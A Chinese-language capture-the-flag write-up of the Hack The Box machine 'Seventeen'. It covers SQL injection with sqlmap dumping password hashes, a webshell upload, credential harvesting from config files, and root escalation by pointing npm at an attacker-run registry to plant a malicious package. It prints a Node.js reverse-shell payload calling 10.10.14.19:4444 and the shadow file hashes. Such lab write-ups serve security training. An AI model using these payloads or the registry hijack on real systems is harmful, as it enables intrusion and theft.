基本信息

端口扫描

22,80,8000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ nmap -sC -sV -Pn 10.10.11.165
Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-18 23:15 CST
Nmap scan report for 10.10.11.165
Host is up (0.41s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2eb26ebb927d5e6b3693171a8209e464 (RSA)
| 256 1f57c653fc2d8b517d304202a4d65f44 (ECDSA)
|_ 256 d5a5363819fe0d677916e6da1791ebad (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Let's begin your education with us!
8000/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 403 Forbidden
Service Info: Host: 172.17.0.4; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.21 seconds

80

一个教育相关的,可以得到对应域名:

1
2
$ curl -s 10.10.11.165 | grep seventeen | html2text | head -n1
seventeen.htb

8000

直接访问是403:

子域名扫描

添加hosts后扫描子域名,发现exam:

1
2
3
4
5
10.10.11.165 seventeen.htb

gobuster vhost -u http://seventeen.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

Found: exam.seventeen.htb (Status: 200) [Size: 17375]

exam.seventeen.htb

一个考试管理系统:

sql注入

exam系统搜索发现sql注入:

1
2
3
4
5
6
7
sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" --batch -dbs

available databases [4]:
[*] db_sfms
[*] erms_db
[*] information_schema
[*] roundcubedb

信息

dump数据库,sfms student表中得到一个账号密码,erms user中以及oldmanagement路径:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" --batch -D db_sfms --dump

Database: db_sfms
[3 tables]
+---------+
| user |
| storage |
| student |
+---------+

Database: db_sfms
Table: student
[4 entries]
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| stud_id | yr | gender | stud_no | lastname | password | firstname |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| 1 | 1A | Male | 12345 | Smith | 1a40620f9a4ed6cb8d81a1d365559233 | John |
| 2 | 2B | Male | 23347 | Mille | abb635c915b0cc296e071e8d76e9060c | James |
| 3 | 2C | Female | 31234 | Shane | a2afa567b1efdb42d8966353337d9024 (autodestruction) | Kelly |
| 4 | 3C | Female | 43347 | Hales | a1428092eb55781de5eb4fd5e2ceb835 | Jamie |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+

Database: erms_db
Table: users
[3 entries]
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| 1 | 1 | ../oldmanagement/files/avatar.png | Admin | fc8ec7b43523e186a27f46957818391c | admin | Adminstrator | 2021-01-20 14:02:37 | NULL | 2022-02-24 22:00:15 |
| 6 | 2 | ../oldmanagement/files/avatar.png | Anthony | 48bb86d036bb993dfdcf7fefdc60cc06 | UndetectableMark | Mark | 2021-09-30 16:34:02 | NULL | 2022-05-10 08:21:39 |
| 7 | 2 | ../oldmanagement/files/avatar.png | Smith | 184fe92824bea12486ae9a56050228ee | Stev1992 | Steven | 2022-02-22 21:05:07 | NULL | 2022-02-24 22:00:24 |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+

oldmanagement

这个路径是8000端口的,使用得到的账号密码登录,发现文件上传功能:

webshell

直接上传是在学生id目录下不解析,修改一下传到上层目录即可:

reverse shell

信息

php文件中得到账号密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
www-data@5ec5dfc2216b:/var/www/html/employeemanagementsystem/process$ cat dbh.php
</html/employeemanagementsystem/process$ cat dbh.php
<?php

$servername = "localhost";
$dBUsername = "root";
$dbPassword = "2020bestyearofmylife";
$dBName = "ems";

$conn = mysqli_connect($servername, $dBUsername, $dbPassword, $dBName);

if(!$conn){
echo "Databese Connection Failed";
}

?>
www-data@5ec5dfc2216b:/var/www/html/employeemanagementsystem/process$ pwd
pwd
/var/www/html/employeemanagementsystem/process

查看用户信息发现mark:

1
2
3
4
www-data@5ec5dfc2216b:/var/www$ cat /etc/passwd | grep sh$
cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
mark:x:1000:1000:,,,:/var/www/html:/bin/bash

user flag

mark用户密码就是数据库密码,ssh登录:

kavi

再次检查,会发现kavi:

1
2
3
4
mark@seventeen:/var/www/html$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
kavi:x:1000:1000:kavi:/home/kavi:/bin/bash
mark:x:1001:1001:,,,:/home/mark:/bin/bash

opt目录下发现一个nodejs应用,安装有一些模块,但我们没有读权限

查看端口发现4873, 搜索资料发现是Verdaccio的端口:

1
2
3
mark@seventeen:/tmp$ ss -tunlp

tcp LISTEN 0 128 127.0.0.1:4873 0.0.0.0:*

所以这些很可能是私有npm模块,我们可以尝试以当前用户安装这些模块,查看其中内容

db-logger

直接npm安装对应模块,查看内容,在其中发现一个密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
npm --registry http://127.0.0.1:4873 info db-logger

npm --registry http://127.0.0.1:4873 install db-logger

mark@seventeen:/tmp$ cd node_modules/db-logger/
mark@seventeen:/tmp/node_modules/db-logger$ ls
logger.js package.json
mark@seventeen:/tmp/node_modules/db-logger$ cat logger.js
var mysql = require('mysql');

var con = mysql.createConnection({
host: "localhost",
user: "root",
password: "IhateMathematics123#",
database: "logger"
});

function log(msg) {
con.connect(function(err) {
if (err) throw err;
var date = Date();
var sql = `INSERT INTO logs (time, msg) VALUES (${date}, ${msg});`;
con.query(sql, function (err, result) {
if (err) throw err;
console.log("[+] Logged");
});
});
};

module.exports.log = log

kavi again

得到的密码就是kavi密码,ssh登录:

提权信息

根据上面的显示结果,查看对应文件内容,发现是安装两个模块后运行app,loglevel原本是没有安装的,运行后会安装,如果我们修改kavi用户的npmrc文件,即可控制安装来源,从而安装恶意模块,然后以root身份被执行:

提权 & root flag

根据文档自己本地npm package server,托管恶意模块:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# 启动server
npm install --global verdaccio
verdaccio --listen 0.0.0.0:4873

# 制作package
# server上原本package下载下来修改
kavi@seventeen:/tmp/miao$ npm install loglevel
kavi@seventeen:/tmp/miao/node_modules$ zip -r ./loglevel.zip loglevel/*

nano lib/loglevel.js
# 在开头添加恶意代码

npm adduser --registry http://localhost:4873
npm login --registry http://localhost:4873
npm unpublish --force --registry http://localhost:4873
npm publish --registry http://localhost:4873

然后运行,恶意模块被安装,代码被执行,得到root:

evil code

1
2
3
4
5
6
7
8
9
10
11
12
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/bash", []);
var client = new net.Socket();
client.connect(4444, "10.10.14.19", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();

shadow

1
2
3
root:$6$zKJAdLXN$2q2KQQs7CNXr6p.GJAuzESBeX97RB2cdQID4hUUv12CIZvEhCATo8JqsvzVghUlHGVfHXgAuWIVE.GtdVVZPw.:19092:0:99999:7:::
kavi:$6$p67ISnef$mypsB6eaLk.iD7WzNHdnZBoKO1O1OgIE1E6pQ.7LidVs4O7TYNvnMkEMVFYXTrmxazGhMHf07HTwFyySxhY.V.:19092:0:99999:7:::
mark:$6$wQBYfx4H$H65tyKF3GL/61g4gr02xDnu5R4NerpbwhjO5ySUwx8Z701bfRLpXTli79hG67okVJQ6wlueO5NYWCVLONguxU1:19092:0:99999:7:::

参考资料